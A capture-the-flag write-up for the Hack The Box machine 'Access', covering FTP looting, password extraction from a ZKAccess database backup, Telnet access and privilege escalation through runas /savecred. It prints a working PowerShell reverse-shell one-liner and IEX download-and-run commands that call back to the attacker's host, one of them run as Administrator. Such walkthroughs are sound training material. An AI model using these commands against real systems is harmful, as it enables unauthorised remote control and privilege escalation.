Access

Join The Best Hacking Community Worldwide | Hack The Box

Over half a million platform members exhange ideas and methodologies. Be one of us and help the community grow even further!

www.hackthebox.com

Enumeration

Nmap

The Nmap scan indicates that anonymous FTP, Telnet, and a web server running IIS 7.5 are accessible. This IIS release comes bundled with Windows Server 2008 R2. A quick look at the website shows a still image taken from a data centre video feed.

ports=$(nmap -p- --min-rate=1000 -T4 10.129.235.125 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.129.235.125 -oN nmap_tcp -v

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

HTTP

FTP

On reviewing the FTP server, two files were found: backup.mdb and Access Contro.zip. As both are binary files, the FTP transfer mode was set to binary. After resetting the machine, the IP address has since changed.

└──╼ [★]$ ftp 10.129.235.126
Connected to 10.129.235.126.
220 Microsoft FTP Service
Name (10.129.235.126:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
425 Cannot open data connection.
200 PORT command successful.
150 Opening ASCII mode data connection.
08-23-18  09:16PM       <DIR>          Backups
08-24-18  10:00PM       <DIR>          Engineer
226 Transfer complete.
ftp> cd Backups
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  09:16PM              5652480 backup.mdb
226 Transfer complete.
ftp> type binary
200 Type set to I.
ftp> get backup.mdb
local: backup.mdb remote: backup.mdb
200 PORT command successful.
125 Data connection already open; Transfer starting.
100% |*************************************************************************************************************************************************|  5520 KiB  423.49 KiB/s    00:00 ETA
226 Transfer complete.
5652480 bytes received in 00:13 (423.48 KiB/s)
ftp> cd ..
250 CWD command successful.
ftp> cd Engineer
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection.
08-24-18  01:16AM                10870 Access Control.zip
226 Transfer complete.
ftp> get "Access Control.zip"
local: Access Control.zip remote: Access Control.zip
200 PORT command successful.
125 Data connection already open; Transfer starting.
100% |*************************************************************************************************************************************************| 10870       14.15 KiB/s    00:00 ETA
226 Transfer complete.
10870 bytes received in 00:00 (14.14 KiB/s)
ftp> exit
221 Goodbye.

Inspecting Interesting Files

mdb-tools

Running the file command on backup.mdb confirms that it is a Microsoft Access database. This can be analysed with the mdb-tools suite.

└──╼ [★]$ file backup.mdb
backup.mdb: Microsoft Access Database

The database tables are listed using mdb-tables, with grep colour output applied to highlight the tables of interest.

└──╼ [★]$ mdb-tables backup.mdb | grep --color=auto user
<SNIP auth_user auth_user_groups auth_user_user_permissions <SNIP>

An auth_user table is present, which appears to be a database backup from a ZKAccess installation. ZKAccess is an access control application used to manage card readers and the physical security of a site. Data from this table is extracted with mdb-export, revealing usernames along with plaintext passwords.

└──╼ [★]$ mdb-export backup.mdb auth_user
id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access<SNIP>",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,

7z

Using the unzip command to extract the zip file fails, as it was compressed with an unsupported format. The file is then inspected with 7z, which reveals it is encrypted with the AES-256 algorithm. This encryption method is compatible with both 7z and WinZip.

└──╼ [★]$ unzip "Access Control.zip"
Archive:  Access Control.zip
   skipping: Access Control.pst      unsupported compression method 99

└──╼ [★]$ 7z l -slt "Access Control.zip"

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs DO-Regular (406F1),ASM,AES-NI)

Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)

Listing archive: Access Control.zip

--
Path = Access Control.zip
Type = zip
Physical Size = 10870

----------
Path = Access Control.pst
Folder = -
Size = 271360
Packed Size = 10678
Modified = 2018-08-23 19:13:52
Created = 2018-08-23 18:44:57
Accessed = 2018-08-23 18:44:57
Attributes = A
Encrypted = +
Comment = 
CRC = 1D60603C
Method = AES-256 Deflate
Host OS = FAT
Version = 20
Volume Index = 0

The zip file is successfully extracted using the password obtained earlier.

└──╼ [★]$ 7z x "Access Control.zip"

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs DO-Regular (406F1),ASM,AES-NI)

Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)

Extracting archive: Access Control.zip
--
Path = Access Control.zip
Type = zip
Physical Size = 10870

    
Enter password (will not be echoed):
Everything is Ok         

Size:       271360
Compressed: 10870

Foothold

The extraction reveals a file named Access Contro.pst, which is a Microsoft Outlook Personal Folder file used to store emails and related items. This can be examined further with the readpst utility. The tool can be installed by running:

sudo apt install pst-utils

└──╼ [★]$ readpst -tea -m "Access Control.pst"
Opening PST file and indexes...
Processing Folder "Deleted Items"
	"Access Control" - 2 items done, 0 items skipped.

We install thunderbird and open the eml file with thunderbird.

sudo apt install thunderbird

The email contains the password for the security account. Using these credentials, a Telnet session can be established, allowing access to retrieve the user flag.

└──╼ [★]$ telnet 10.129.235.126
Trying 10.129.235.126...
Connected to 10.129.235.126.
Escape character is '^]'.
Welcome to Microsoft Telnet Service 

login: security
password: 

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>dir
 Volume in drive C has no label.
 Volume Serial Number is 8164-DB5F

 Directory of C:\Users\security

08/23/2018  11:52 PM    <DIR>          .
08/23/2018  11:52 PM    <DIR>          ..
08/24/2018  08:37 PM    <DIR>          .yawcam
08/21/2018  11:35 PM    <DIR>          Contacts
08/28/2018  07:51 AM    <DIR>          Desktop
08/21/2018  11:35 PM    <DIR>          Documents
08/21/2018  11:35 PM    <DIR>          Downloads
08/21/2018  11:35 PM    <DIR>          Favorites
08/21/2018  11:35 PM    <DIR>          Links
08/21/2018  11:35 PM    <DIR>          Music
08/21/2018  11:35 PM    <DIR>          Pictures
08/21/2018  11:35 PM    <DIR>          Saved Games
08/21/2018  11:35 PM    <DIR>          Searches
08/24/2018  08:39 PM    <DIR>          Videos
               0 File(s)              0 bytes
              14 Dir(s)   3,340,615,680 bytes free

C:\Users\security>cd Desktop

C:\Users\security\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 8164-DB5F

 Directory of C:\Users\security\Desktop

08/28/2018  07:51 AM    <DIR>          .
08/28/2018  07:51 AM    <DIR>          ..
09/08/2025  05:35 AM                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)   3,340,615,680 bytes free

C:\Users\security\Desktop>type user.txt
830b<SNIP>12b5

Post-Exploitation

Upgrade from telnet shell

The Telnet shell is limited and not very practical. To obtain a more stable shell, a Python web server is started to host shell.ps1.

sudo python3 -m http.server 8000

Use the PowerShell reverse shell one-liner and save it as shell.ps1.

$client = New-Object System.Net.Sockets.TCPClient('10.10.14.7',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Start a netcat listener on port 443.

sudo nc -nvlp 443

The START command is employed to prevent the current Telnet session from becoming locked. The /B parameter ensures that no new window is created, allowing the incoming shell to use the full width of the screen rather than being restricted by the Telnet session’s display width. The IEX command (an alias for Invoke-Expression) executes the downloaded content directly in memory.

C:\Users\security>START /B "" powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.7:8000/shell.ps1')

After running the command, we catch a reverse shell:

└──╼ [★]$ sudo nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.7] from (UNKNOWN) [10.129.235.126] 49160

PS C:\Users\security>

Saved Credentials

Running cmdkey /list shows that stored credentials exist for the Administrator account.

PS C:\Users\security> cmdkey /list

Currently stored credentials:

    Target: Domain:interactive=ACCESS\Administrator
    Type: Domain Password
    User: ACCESS\Administrator

Windows can store credentials for various reasons. One common case is when a system administrator sets up an application to run with the /savecred option. This stores credentials so that the user does not need to repeatedly enter the administrator password. However, Windows does not limit the use of runas /savecred to a single application. Once enabled, it can be used to run any command with elevated privileges.

Administrators may use this approach to save time, bypass application whitelisting, or grant write access to protected directories. Typically, runas /savecred is configured within a shortcut (.lnk file). The following commands enumerate all shortcut files on the system and check them for the use of runas.

Get-ChildItem "C:\" *.lnk -Recurse -Force | ft fullname | Out-File shortcuts.txt
ForEach($file in gc .\shortcuts.txt) { Write-Output $file; gc $file | Select-String runas }

It seems that the ZKAccess shortcut on the Public Desktop has been configured in this way.

<SNIP>
C:\Users\Public\Desktop\ZKAccess3.5 Security System.lnk                                                                                                                                      

L?F?@ ??7???7???#?P/P?O? ?:i?+00?/C:\R1M?:Windows???:?�M?:*wW
indowsV1MV?System32???:?�MV?*?System32X2P?:?
                                             runas.exe???:1??:1?*Yrunas.exe
L-K??E?C:\Windows\System32\runas.exe#..\..\..\Windows\System32\runas.exeC:\ZKTeco\ZKAccess
3.5G/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"'C:\ZKTeco\ZKAccess3
.5\img\AccessNET.ico?%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico
<SNIP>

When reviewing the Public user profile, the Desktop folder is not immediately visible because it is hidden. However, it can still be accessed by browsing into the folder and listing its contents. The folder is available to the built-in NT AUTHORITY\INTERACTIVE group. Any user who logs in interactively, either locally or through Remote Desktop or Telnet, will have the Interactive SID in their access token.

PS C:\Users\security> ls C:\Users\Public


    Directory: C:\Users\Public


Mode                LastWriteTime     Length Name                                                                                                                                            
----                -------------     ------ ----                                                                                                                                            
d-r--         7/14/2009   6:06 AM            Documents                                                                                                                                       
d-r--         7/14/2009   5:57 AM            Downloads                                                                                                                                       
d-r--         7/14/2009   5:57 AM            Music                                                                                                                                           
d-r--         7/14/2009   5:57 AM            Pictures                                                                                                                                        
d-r--         7/14/2009   5:57 AM            Videos                                                                                                                                          


PS C:\Users\security> icacls C:\Users\Public\Desktop
C:\Users\Public\Desktop BUILTIN\Administrators:(OI)(CI)(F)
                        NT AUTHORITY\INTERACTIVE:(OI)(CI)(RX)
                        NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                        ACCESS\Administrator:(OI)(CI)(IO)(DE,DC)

Successfully processed 1 files; Failed processing 0 files

PS C:\Users\security> whoami /groups

GROUP INFORMATION
-----------------

Group Name                             Type             SID                                        Attributes                                        
====================================== ================ ========================================== ==================================================
Everyone                               Well-known group S-1-1-0                                    Mandatory group, Enabled by default, Enabled group
ACCESS\TelnetClients                   Alias            S-1-5-21-953262931-566350628-63446256-1000 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                               Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE               Well-known group S-1-5-4                                    Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1                                    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10                                Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192                                Mandatory group, Enabled by default, Enabled group

Privilege Escalation

Exploiting runas /savecred

The following command is used to launch a PowerShell reverse shell as ACCESS\Administrator. The root flag is then retrieved from the Administrator’s Desktop.

C:\Users\security>runas /user:ACCESS\Administrator /savecred "powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.7:8000/shell.ps1')"

└──╼ [★]$ sudo nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.7] from (UNKNOWN) [10.129.235.126] 49167

PS C:\Windows\system32> whoami
access\administrator

PS C:\Users\Administrator\Desktop> cat root.txt
23e9<SNIP>ca7b

References

https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1
https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials
HTB Official Walkthrough for Access